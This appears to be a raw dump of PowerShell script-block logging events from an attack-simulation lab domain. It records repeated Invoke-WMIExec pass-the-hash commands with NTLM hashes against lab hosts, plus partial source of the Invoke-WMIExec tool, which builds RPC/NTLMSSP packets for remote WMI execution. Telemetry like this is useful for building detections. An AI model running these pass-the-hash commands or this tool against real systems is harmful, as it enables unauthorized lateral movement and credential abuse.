4104152150x0732153Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local11Invoke-WMIExec -Target 10.0.1.15 -Username misty_marsh -Hash ead0cc57ddaae50d876b7dd6386fa9c7 -Command calc.exe -verbose -Domain attackrange.local8056b295-31b2-4fd8-bed2-49491cee623f 4104152150x0731889Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local11Invoke-WMIExec -Target 10.0.1.15 -Username misty_marsh -Hash ead0cc57ddaae50d876b7dd6386fa9c7 -Command calc.exe -verbose1bb15870-f113-4005-95f8-6bfb601d8ee7 4104152150x0731625Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local11Invoke-WMIExec -Target 10.0.1.15 -Username misty_marsh -Hash ead0cc57ddaae50d876b7dd6386fa9c7 -Command calc.exe -verbose -Domain MSWIN-EXCH01ddf3a153-0694-4905-8071-8068b178ae1b 4104152150x0731347Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local11Invoke-WMIExec -Target 10.0.1.15 -Username administrator -Hash 499e7d8c6c8ad470e57e00d0f3618d5e -Command calc.exe -verbose140f6c6b-7551-4ef8-accb-308e412e5a7e 4104152150x0731329Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local11Invoke-WMIExec -Target mswin-exch01 -Username administrator -Hash 499e7d8c6c8ad470e57e00d0f3618d5e -Command calc.exe -verbose -Domain mswin-exch011458c511-4c22-46e3-85c3-05e60fa84370 4104152150x0731311Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local11Invoke-WMIExec -Target mswin-exch01 -Username administrator -Hash 499e7d8c6c8ad470e57e00d0f3618d5e -Command calc.exe -verbosecd5e1f2c-27fb-4d38-954e-5c7474d2ac38 4104152150x0731047Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local11Invoke-WMIExec -Target 10.0.1.15 -Username administrator -Hash 499e7d8c6c8ad470e57e00d0f3618d5e -Command calc.exe -verbose1f6d967f-75a2-4c39-895f-a96e9bf43956 4104152150x0730783Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local11Invoke-WMIExec -Target 10.0.1.15 -Username administrator -Hash 499e7d8c6c8ad470e57e00d0f3618d5e -Command calc.exe -verbose -Domain MSWIN-EXCH01d9224d9a-631c-44f9-84ef-116aa688c941 4104152150x0730519Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local11Invoke-WMIExec -Target 10.0.1.15 -Username administrator -Hash ead0cc57ddaae50d876b7dd6386fa9c7 -Command calc.exe -verbose -Domain MSWIN-EXCH0192b41543-c381-4e35-a8d9-15878f11c09d 4104152150x0730255Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local11Invoke-WMIExec -Target 10.0.1.15 -Username bob -Hash ead0cc57ddaae50d876b7dd6386fa9c7 -Command calc.exe -verbose -Domain MSWIN-EXCH01c2e8d2b4-722b-40c4-9eb8-cdcd83f88447 4104152150x0729991Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local11Invoke-WMIExec -Target 10.0.1.15 -Username bob -Hash ead0cc57ddaae50d876b7dd6386fa9c7 -Command calc.exe -verboseb5ee3af5-6fc5-42fa-9555-dc20bbd3eb42 4104152150x0729727Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local11Invoke-WMIExec -Target 10.0.1.15 -Username .\administrator -Hash ead0cc57ddaae50d876b7dd6386fa9c7 -Command calc.exe -verbose3beb8c9d-c964-4e30-9334-8458a2201a04 4104152150x0729463Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local11Invoke-WMIExec -Target 10.0.1.15 -Username administrator -Hash ead0cc57ddaae50d876b7dd6386fa9c7 -Command calc.exe -verbose84b2d057-4258-4d96-9989-f5ebf1021695 4104152150x0729199Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local11Invoke-WMIExec -Target 10.0.1.15 -Username administrator -Domain attackrange.local -Hash ead0cc57ddaae50d876b7dd6386fa9c7 -Command calc.exe -verbosed4380038-8272-4e08-b37e-e17f91a5aaa2 4104152150x0728928Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local11Invoke-WMIExec -Target 10.0.1.15 -Username administrator -Domain attackrange.local -Hash ead0cc57ddaae50d876b7dd6386fa9c7 -Command calc.exe68a3efb6-7ce3-4eff-9357-b18a44acfbb3 4104152150x0728664Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local11Invoke-WMIExec -Target mswin-exch01.attackrange.local -Username administrator -Domain attackrange.local -Hash ead0cc57ddaae50d876b7dd6386fa9c7 -Command calc.exeee7bf265-2eda-4e7e-92ac-defd9d60bdd1 4104152150x0728400Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local11Invoke-WMIExec -Target mswin-exch01.attackrange.local -Username administrator -Domain attackrange.local -Hash ead0cc57ddaae50d876b7dd6386fa9c7 calc.exec0beaf98-259d-4620-b521-bfb80573d1db 4104152150x0728115Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local11Invoke-WMIExec -Target mswin-exch01.attackrange.local -Username administrator -Domain attackrange.local -Hash ead0cc57ddaae50d876b7dd6386fa9c79ade12b1-6265-48ad-9273-df266773f489 4104152150x0727844Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local11Invoke-WMIExec -Target mswin-server.attackrange.local -Username administrator -Domain attackrange.local -Hash ead0cc57ddaae50d876b7dd6386fa9c79f2cf709-f803-4c0f-9058-a35ce6ff724b 4104152150x0727566Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local11Invoke-WMIExec -Target 127.0.0.1 -Username administrator -Domain attackrange.local -Hash ead0cc57ddaae50d876b7dd6386fa9c7ff9424df-58dd-4484-b2b0-e2eb95757611 4104152150x0727295Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local11Invoke-WMIExec -Target 10.0.1.15 -Username administrator -Domain attackrange.local -Hash ead0cc57ddaae50d876b7dd6386fa9c7fbbe5b00-59e9-45d4-8ac4-4c2670bc7385 4104152150x0727021Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local11Invoke-WMIExec -Target 10.0.1.15 -Username administrator -Domain attackrange -Hash ead0cc57ddaae50d876b7dd6386fa9c780154d36-1c44-43e6-b4a0-24ffc6759dcf 4104152150x0726733Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local11Invoke-WMIExec -Target 10.0.1.15 -Hash ead0cc57ddaae50d876b7dd6386fa9c73a30adae-9dc4-490a-b882-5668d737e9cb 4104132150x0726713Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local18function Invoke-WMIExec { <# .SYNOPSIS Invoke-WMIExec performs WMI command execution on targets using NTLMv2 pass the hash authentication. Author: Kevin Robertson (@kevin_robertson) License: BSD 3-Clause .PARAMETER Target Hostname or IP address of target. .PARAMETER Username Username to use for authentication. .PARAMETER Domain Domain to use for authentication. This parameter is not needed with local accounts or when using @domain after the username. .PARAMETER Hash NTLM password hash for authentication. This module will accept either LM:NTLM or NTLM format. .PARAMETER Command Command to execute on the target. If a command is not specified, the function will just check to see if the username and hash has access to WMI on the target. .PARAMETER Sleep Default = 10 Milliseconds: Sets the function's Start-Sleep values in milliseconds. You can try tweaking this setting if you are experiencing strange results. .EXAMPLE Execute a command. Invoke-WMIExec -Target 192.168.100.20 -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Command "command or launcher to execute" -verbose .EXAMPLE Check command execution privilege. Invoke-WMIExec -Target 192.168.100.20 -Username administrator -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 .LINK https://github.com/Kevin-Robertson/Invoke-TheHash #> [CmdletBinding()] param ( [parameter(Mandatory=$true)][String]$Target, [parameter(Mandatory=$true)][String]$Username, [parameter(Mandatory=$false)][String]$Domain, [parameter(Mandatory=$false)][String]$Command, [parameter(Mandatory=$true)][ValidateScript({$_.Length -eq 32 -or $_.Length -eq 65})][String]$Hash, [parameter(Mandatory=$false)][Int]$Sleep=10 ) if($Command) { $WMI_execute = $true } function ConvertFrom-PacketOrderedDictionary { param($packet_ordered_dictionary) ForEach($field in $packet_ordered_dictionary.Values) { $byte_array += $field } return $byte_array } #RPC function New-PacketRPCBind { param([Int]$packet_call_ID,[Byte[]]$packet_max_frag,[Byte[]]$packet_num_ctx_items,[Byte[]]$packet_context_ID,[Byte[]]$packet_UUID,[Byte[]]$packet_UUID_version) [Byte[]]$packet_call_ID_bytes = [System.BitConverter]::GetBytes($packet_call_ID) $packet_RPCBind = New-Object System.Collections.Specialized.OrderedDictionary $packet_RPCBind.Add("Version",[Byte[]](0x05)) $packet_RPCBind.Add("VersionMinor",[Byte[]](0x00)) $packet_RPCBind.Add("PacketType",[Byte[]](0x0b)) $packet_RPCBind.Add("PacketFlags",[Byte[]](0x03)) $packet_RPCBind.Add("DataRepresentation",[Byte[]](0x10,0x00,0x00,0x00)) $packet_RPCBind.Add("FragLength",[Byte[]](0x48,0x00)) $packet_RPCBind.Add("AuthLength",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("CallID",$packet_call_ID_bytes) $packet_RPCBind.Add("MaxXmitFrag",[Byte[]](0xb8,0x10)) $packet_RPCBind.Add("MaxRecvFrag",[Byte[]](0xb8,0x10)) $packet_RPCBind.Add("AssocGroup",[Byte[]](0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("NumCtxItems",$packet_num_ctx_items) $packet_RPCBind.Add("Unknown",[Byte[]](0x00,0x00,0x00)) $packet_RPCBind.Add("ContextID",$packet_context_ID) $packet_RPCBind.Add("NumTransItems",[Byte[]](0x01)) $packet_RPCBind.Add("Unknown2",[Byte[]](0x00)) $packet_RPCBind.Add("Interface",$packet_UUID) $packet_RPCBind.Add("InterfaceVer",$packet_UUID_version) $packet_RPCBind.Add("InterfaceVerMinor",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("TransferSyntax",[Byte[]](0x04,0x5d,0x88,0x8a,0xeb,0x1c,0xc9,0x11,0x9f,0xe8,0x08,0x00,0x2b,0x10,0x48,0x60)) $packet_RPCBind.Add("TransferSyntaxVer",[Byte[]](0x02,0x00,0x00,0x00)) if($packet_num_ctx_items[0] -eq 2) { $packet_RPCBind.Add("ContextID2",[Byte[]](0x01,0x00)) $packet_RPCBind.Add("NumTransItems2",[Byte[]](0x01)) $packet_RPCBind.Add("Unknown3",[Byte[]](0x00)) $packet_RPCBind.Add("Interface2",[Byte[]](0xc4,0xfe,0xfc,0x99,0x60,0x52,0x1b,0x10,0xbb,0xcb,0x00,0xaa,0x00,0x21,0x34,0x7a)) $packet_RPCBind.Add("InterfaceVer2",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("InterfaceVerMinor2",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("TransferSyntax2",[Byte[]](0x2c,0x1c,0xb7,0x6c,0x12,0x98,0x40,0x45,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("TransferSyntaxVer2",[Byte[]](0x01,0x00,0x00,0x00)) } elseif($packet_num_ctx_items[0] -eq 3) { $packet_RPCBind.Add("ContextID2",[Byte[]](0x01,0x00)) $packet_RPCBind.Add("NumTransItems2",[Byte[]](0x01)) $packet_RPCBind.Add("Unknown3",[Byte[]](0x00)) $packet_RPCBind.Add("Interface2",[Byte[]](0x43,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46)) $packet_RPCBind.Add("InterfaceVer2",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("InterfaceVerMinor2",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("TransferSyntax2",[Byte[]](0x33,0x05,0x71,0x71,0xba,0xbe,0x37,0x49,0x83,0x19,0xb5,0xdb,0xef,0x9c,0xcc,0x36)) $packet_RPCBind.Add("TransferSyntaxVer2",[Byte[]](0x01,0x00,0x00,0x00)) $packet_RPCBind.Add("ContextID3",[Byte[]](0x02,0x00)) $packet_RPCBind.Add("NumTransItems3",[Byte[]](0x01)) $packet_RPCBind.Add("Unknown4",[Byte[]](0x00)) $packet_RPCBind.Add("Interface3",[Byte[]](0x43,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46)) $packet_RPCBind.Add("InterfaceVer3",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("InterfaceVerMinor3",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("TransferSyntax3",[Byte[]](0x2c,0x1c,0xb7,0x6c,0x12,0x98,0x40,0x45,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("TransferSyntaxVer3",[Byte[]](0x01,0x00,0x00,0x00)) $packet_RPCBind.Add("AuthType",[Byte[]](0x0a)) $packet_RPCBind.Add("AuthLevel",[Byte[]](0x04)) $packet_RPCBind.Add("AuthPadLength",[Byte[]](0x00)) $packet_RPCBind.Add("AuthReserved",[Byte[]](0x00)) $packet_RPCBind.Add("ContextID4",[Byte[]](0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("Identifier",[Byte[]](0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00)) $packet_RPCBind.Add("MessageType",[Byte[]](0x01,0x00,0x00,0x00)) $packet_RPCBind.Add("NegotiateFlags",[Byte[]](0x97,0x82,0x08,0xe2)) $packet_RPCBind.Add("CallingWorkstationDomain",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("CallingWorkstationName",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("OSVersion",[Byte[]](0x06,0x01,0xb1,0x1d,0x00,0x00,0x00,0x0f)) } if($packet_call_ID -eq 3) { $packet_RPCBind.Add("AuthType",[Byte[]](0x0a)) $packet_RPCBind.Add("AuthLevel",[Byte[]](0x02)) $packet_RPCBind.Add("AuthPadLength",[Byte[]](0x00)) $packet_RPCBind.Add("AuthReserved",[Byte[]](0x00)) $packet_RPCBind.Add("ContextID3",[Byte[]](0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("Identifier",[Byte[]](0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00)) $packet_RPCBind.Add("MessageType",[Byte[]](0x01,0x00,0x00,0x00)) $packet_RPCBind.Add("NegotiateFlags",[Byte[]](0x97,0x82,0x08,0xe2)) $packet_RPCBind.Add("CallingWorkstationDomain",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("CallingWorkstationName",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("OSVersion",[Byte[]](0x06,0x01,0xb1,0x1d,0x00,0x00,0x00,0x0f)) } return $packet_RPCBind } function New-PacketRPCAUTH3 { param([Byte[]]$packet_NTLMSSP) [Byte[]]$packet_NTLMSSP_length = [System.BitConverter]::GetBytes($packet_NTLMSSP.Length)[0,1] [Byte[]]$packet_RPC_length = [System.BitConverter]::GetBytes($packet_NTLMSSP.Length + 28)[0,1] $packet_RPCAuth3 = New-Object System.Collections.Specialized.OrderedDictionary $packet_RPCAuth3.Add("Version",[Byte[]](0x05)) $packet_RPCAuth3.Add("VersionMinor",[Byte[]](0x00)) $packet_RPCAuth3.Add("PacketType",[Byte[]](0x10)) $packet_RPCAuth3.Add("PacketFlags",[Byte[]](0x03)) $packet_RPCAuth3.Add("DataRepresentation",[Byte[]](0x10,0x00,0x00,0x00)) $packet_RPCAuth3.Add("FragLength",$packet_RPC_length) $packet_RPCAuth3.Add("AuthLength",$packet_NTLMSSP_length) $packet_RPCAuth3.Add("CallID",[Byte[]](0x03,0x00,0x00,0x00)) $packet_RPCAuth3.Add("MaxXmitFrag",[Byte[]](0xd0,0x16)) $packet_RPCAuth3.Add("MaxRecvFrag",[Byte[]](0xd0,0x16)) $packet_RPCAuth3.Add("AuthType",[Byte[]](0x0a)) $packet_RPCAuth3.Add("AuthLevel",[Byte[]](0x02)) $packet_RPCAuth3.Add("AuthPadLength",[Byte[]](0x00)) $packet_RPCAuth3.Add("AuthReserved",[Byte[]](0x00)) $packet_RPCAuth3.Add("ContextID",[Byte[]](0x00,0x00,0x00,0x00)) $packet_RPCAuth3.Add("NTLMSSP",$packet_NTLMSSP) return $packet_RPCAuth3 } function New-PacketRPCRequest { param([Byte[]]$packet_flags,[Int]$packet_service_length,[Int]$packet_auth_length,[Int]$packet_auth_padding,[Byte[]]$packet_call_ID,[Byte[]]$packet_context_ID,[Byte[]]$packet_opnum,[Byte[]]$packet_data) if($packet_auth_length -gt 0) { $packet_full_auth_length = $packet_auth_length + $packet_auth_padding + 8 } [Byte[]]$packet_write_length = [System.BitConverter]::GetBytes($packet_service_length + 24 + $packet_full_auth_length + $packet_data.Length) [Byte[]]$packet_frag_length = $packet_write_length[0,1] [Byte[]]$packet_alloc_hint = [System.BitConverter]::GetBytes($packet_service_length + $packet_data.Length) [Byte[]]$packet_auth_length = [System.BitConverter]::GetBytes($packet_auth_length)[0,1] $packet_RPCRequest = New-Object System.Collections.Specialized.OrderedDictionary $packet_RPCRequest.Add("Version",[Byte[]](0x05)) $packet_RPCRequest.Add("VersionMinor",[Byte[]](0x00)) $packet_RPCRequest.Add("PacketType",[Byte[]](0x00)) $packet_RPCRequest.Add("PacketFlags",$packet_flags) $packet_RPCRequest.Add("DataRepresentation",[Byte[]](0x10,0x00,0x00,0x00)) $packet_RPCRequest.Add("FragLength",$packet_frag_length) $packet_RPCRequest.Add("AuthLength",$packet_auth_length) $packet_RPCRequest.Add("CallID",$packet_call_ID) $packet_RPCRequest.Add("AllocHint",$packet_alloc_hint) $packet_RPCRequest.Add("ContextID",$packet_context_ID) $packet_RPCRequest.Add("Opnum",$packet_opnum) if($packet_data.Length) { $packet_RPCRequest.Add("Data",$packet_data) } return $packet_RPCRequest } function New-PacketRPCAlterContext { param([Byte[]]$packet_assoc_group,[Byte[]]$packet_call_ID,[Byte[]]$packet_context_ID,[Byte[]]$packet_interface_UUID) $packet_RPCAlterContext = New-Object System.Collections.Specialized.OrderedDictionary $packet_RPCAlterContext.Add("Version",[Byte[]](0x05)) $packet_RPCAlterContext.Add("VersionMinor",[Byte[]](0x00)) $packet_RPCAlterContext.Add("PacketType",[Byte[]](0x0e)) $packet_RPCAlterContext.Add("PacketFlags",[Byte[]](0x03)) $packet_RPCAlterContext.Add("DataRepresentation",[Byte[]](0x10,0x00,0x00,0x00)) $packet_RPCAlterContext.Add("FragLength",[Byte[]](0x48,0x00)) $packet_RPCAlterContext.Add("AuthLength",[Byte[]](0x00,0x00)) $packet_RPCAlterContext.Add("CallID",$packet_call_ID) $packet_RPCAlterContext.Add("MaxXmitFrag",[Byte[]](0xd0,0x16)) $packet_RPCAlterContext.Add("MaxRecvFrag",[Byte[]](0xd0,0x16)) $packet_RPCAlterContext.Add("AssocGroup",$packet_assoc_group) $packet_RPCAlterContext.Add("NumCtxItems",[Byte[]](0x01)) $packet_RPCAlterContext.Add("Unknown",[Byte[]](0x00,0x00,0x00)) $packet_RPCAlterContext.Add("ContextID",$packet_context_ID) $packet_RPCAlterContext.Add("NumTransItems",[Byte[]](0x01)) $packet_RPCAlterContext.Add("Unknown2",[Byte[]](0x00)) $packet_RPCAlterContext.Add("Interface",$packet_interface_UUID) $packet_RPCAlterContext.Add("InterfaceVer",[Byte[]](0x00,0x00)) $packet_RPCAlterContext.Add("InterfaceVerMinor",[Byte[]](0x00,0x00)) $packet_RPCAlterContext.Add("TransferSyntax",[Byte[]](0x04,0x5d,0x88,0x8a,0xeb,0x1c,0xc9,0x11,0x9f,0xe8,0x08,0x00,0x2b,0x10,0x48,0x60)) $packet_RPCAlterContext.Add("TransferSyntaxVer",[Byte[]](0x02,0x00,0x00,0x00)) return $packet_RPCAlterContext } function New-PacketNTLMSSPVerifier { param([Int]$packet_auth_padding,[Byte[]]$packet_auth_level,[Byte[]]$packet_sequence_number) $packet_NTLMSSPVerifier = New-Object System.Collections.Specialized.Ordereecfc8494-bc1a-415c-bcd5-40cec148873fC:\Users\Administrator\Desktop\invoke-wmiexec.ps1 4104152150x0726711Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local11. .\invoke-wmiexec.ps1a5037dd0-ab3c-43cb-a42e-a88359298b37 4104152150x0726284Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local11Invoke-WMIExec -Target 10.0.1.15 -Username administrator -Domain attackrange -Hash ead0cc57ddaae50d876b7dd6386fa9c75604aa98-7258-445f-aa53-d1c9dd08d06b 4104132150x0725958Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local18function Invoke-WMIExec { <# .SYNOPSIS Invoke-WMIExec performs WMI command execution on targets using NTLMv2 pass the hash authentication. Author: Kevin Robertson (@kevin_robertson) License: BSD 3-Clause .PARAMETER Target Hostname or IP address of target. .PARAMETER Username Username to use for authentication. .PARAMETER Domain Domain to use for authentication. This parameter is not needed with local accounts or when using @domain after the username. .PARAMETER Hash NTLM password hash for authentication. This module will accept either LM:NTLM or NTLM format. .PARAMETER Command Command to execute on the target. If a command is not specified, the function will just check to see if the username and hash has access to WMI on the target. .PARAMETER Sleep Default = 10 Milliseconds: Sets the function's Start-Sleep values in milliseconds. You can try tweaking this setting if you are experiencing strange results. .EXAMPLE Execute a command. Invoke-WMIExec -Target 192.168.100.20 -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Command "command or launcher to execute" -verbose .EXAMPLE Check command execution privilege. Invoke-WMIExec -Target 192.168.100.20 -Username administrator -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 .LINK https://github.com/Kevin-Robertson/Invoke-TheHash #> [CmdletBinding()] param ( [parameter(Mandatory=$true)][String]$Target, [parameter(Mandatory=$true)][String]$Username, [parameter(Mandatory=$false)][String]$Domain, [parameter(Mandatory=$false)][String]$Command, [parameter(Mandatory=$true)][ValidateScript({$_.Length -eq 32 -or $_.Length -eq 65})][String]$Hash, [parameter(Mandatory=$false)][Int]$Sleep=10 ) if($Command) { $WMI_execute = $true } function ConvertFrom-PacketOrderedDictionary { param($packet_ordered_dictionary) ForEach($field in $packet_ordered_dictionary.Values) { $byte_array += $field } return $byte_array } #RPC function New-PacketRPCBind { param([Int]$packet_call_ID,[Byte[]]$packet_max_frag,[Byte[]]$packet_num_ctx_items,[Byte[]]$packet_context_ID,[Byte[]]$packet_UUID,[Byte[]]$packet_UUID_version) [Byte[]]$packet_call_ID_bytes = [System.BitConverter]::GetBytes($packet_call_ID) $packet_RPCBind = New-Object System.Collections.Specialized.OrderedDictionary $packet_RPCBind.Add("Version",[Byte[]](0x05)) $packet_RPCBind.Add("VersionMinor",[Byte[]](0x00)) $packet_RPCBind.Add("PacketType",[Byte[]](0x0b)) $packet_RPCBind.Add("PacketFlags",[Byte[]](0x03)) $packet_RPCBind.Add("DataRepresentation",[Byte[]](0x10,0x00,0x00,0x00)) $packet_RPCBind.Add("FragLength",[Byte[]](0x48,0x00)) $packet_RPCBind.Add("AuthLength",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("CallID",$packet_call_ID_bytes) $packet_RPCBind.Add("MaxXmitFrag",[Byte[]](0xb8,0x10)) $packet_RPCBind.Add("MaxRecvFrag",[Byte[]](0xb8,0x10)) $packet_RPCBind.Add("AssocGroup",[Byte[]](0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("NumCtxItems",$packet_num_ctx_items) $packet_RPCBind.Add("Unknown",[Byte[]](0x00,0x00,0x00)) $packet_RPCBind.Add("ContextID",$packet_context_ID) $packet_RPCBind.Add("NumTransItems",[Byte[]](0x01)) $packet_RPCBind.Add("Unknown2",[Byte[]](0x00)) $packet_RPCBind.Add("Interface",$packet_UUID) $packet_RPCBind.Add("InterfaceVer",$packet_UUID_version) $packet_RPCBind.Add("InterfaceVerMinor",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("TransferSyntax",[Byte[]](0x04,0x5d,0x88,0x8a,0xeb,0x1c,0xc9,0x11,0x9f,0xe8,0x08,0x00,0x2b,0x10,0x48,0x60)) $packet_RPCBind.Add("TransferSyntaxVer",[Byte[]](0x02,0x00,0x00,0x00)) if($packet_num_ctx_items[0] -eq 2) { $packet_RPCBind.Add("ContextID2",[Byte[]](0x01,0x00)) $packet_RPCBind.Add("NumTransItems2",[Byte[]](0x01)) $packet_RPCBind.Add("Unknown3",[Byte[]](0x00)) $packet_RPCBind.Add("Interface2",[Byte[]](0xc4,0xfe,0xfc,0x99,0x60,0x52,0x1b,0x10,0xbb,0xcb,0x00,0xaa,0x00,0x21,0x34,0x7a)) $packet_RPCBind.Add("InterfaceVer2",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("InterfaceVerMinor2",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("TransferSyntax2",[Byte[]](0x2c,0x1c,0xb7,0x6c,0x12,0x98,0x40,0x45,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("TransferSyntaxVer2",[Byte[]](0x01,0x00,0x00,0x00)) } elseif($packet_num_ctx_items[0] -eq 3) { $packet_RPCBind.Add("ContextID2",[Byte[]](0x01,0x00)) $packet_RPCBind.Add("NumTransItems2",[Byte[]](0x01)) $packet_RPCBind.Add("Unknown3",[Byte[]](0x00)) $packet_RPCBind.Add("Interface2",[Byte[]](0x43,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46)) $packet_RPCBind.Add("InterfaceVer2",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("InterfaceVerMinor2",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("TransferSyntax2",[Byte[]](0x33,0x05,0x71,0x71,0xba,0xbe,0x37,0x49,0x83,0x19,0xb5,0xdb,0xef,0x9c,0xcc,0x36)) $packet_RPCBind.Add("TransferSyntaxVer2",[Byte[]](0x01,0x00,0x00,0x00)) $packet_RPCBind.Add("ContextID3",[Byte[]](0x02,0x00)) $packet_RPCBind.Add("NumTransItems3",[Byte[]](0x01)) $packet_RPCBind.Add("Unknown4",[Byte[]](0x00)) $packet_RPCBind.Add("Interface3",[Byte[]](0x43,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46)) $packet_RPCBind.Add("InterfaceVer3",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("InterfaceVerMinor3",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("TransferSyntax3",[Byte[]](0x2c,0x1c,0xb7,0x6c,0x12,0x98,0x40,0x45,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("TransferSyntaxVer3",[Byte[]](0x01,0x00,0x00,0x00)) $packet_RPCBind.Add("AuthType",[Byte[]](0x0a)) $packet_RPCBind.Add("AuthLevel",[Byte[]](0x04)) $packet_RPCBind.Add("AuthPadLength",[Byte[]](0x00)) $packet_RPCBind.Add("AuthReserved",[Byte[]](0x00)) $packet_RPCBind.Add("ContextID4",[Byte[]](0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("Identifier",[Byte[]](0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00)) $packet_RPCBind.Add("MessageType",[Byte[]](0x01,0x00,0x00,0x00)) $packet_RPCBind.Add("NegotiateFlags",[Byte[]](0x97,0x82,0x08,0xe2)) $packet_RPCBind.Add("CallingWorkstationDomain",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("CallingWorkstationName",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("OSVersion",[Byte[]](0x06,0x01,0xb1,0x1d,0x00,0x00,0x00,0x0f)) } if($packet_call_ID -eq 3) { $packet_RPCBind.Add("AuthType",[Byte[]](0x0a)) $packet_RPCBind.Add("AuthLevel",[Byte[]](0x02)) $packet_RPCBind.Add("AuthPadLength",[Byte[]](0x00)) $packet_RPCBind.Add("AuthReserved",[Byte[]](0x00)) $packet_RPCBind.Add("ContextID3",[Byte[]](0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("Identifier",[Byte[]](0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00)) $packet_RPCBind.Add("MessageType",[Byte[]](0x01,0x00,0x00,0x00)) $packet_RPCBind.Add("NegotiateFlags",[Byte[]](0x97,0x82,0x08,0xe2)) $packet_RPCBind.Add("CallingWorkstationDomain",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("CallingWorkstationName",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("OSVersion",[Byte[]](0x06,0x01,0xb1,0x1d,0x00,0x00,0x00,0x0f)) } return $packet_RPCBind } function New-PacketRPCAUTH3 { param([Byte[]]$packet_NTLMSSP) [Byte[]]$packet_NTLMSSP_length = [System.BitConverter]::GetBytes($packet_NTLMSSP.Length)[0,1] [Byte[]]$packet_RPC_length = [System.BitConverter]::GetBytes($packet_NTLMSSP.Length + 28)[0,1] $packet_RPCAuth3 = New-Object System.Collections.Specialized.OrderedDictionary $packet_RPCAuth3.Add("Version",[Byte[]](0x05)) $packet_RPCAuth3.Add("VersionMinor",[Byte[]](0x00)) $packet_RPCAuth3.Add("PacketType",[Byte[]](0x10)) $packet_RPCAuth3.Add("PacketFlags",[Byte[]](0x03)) $packet_RPCAuth3.Add("DataRepresentation",[Byte[]](0x10,0x00,0x00,0x00)) $packet_RPCAuth3.Add("FragLength",$packet_RPC_length) $packet_RPCAuth3.Add("AuthLength",$packet_NTLMSSP_length) 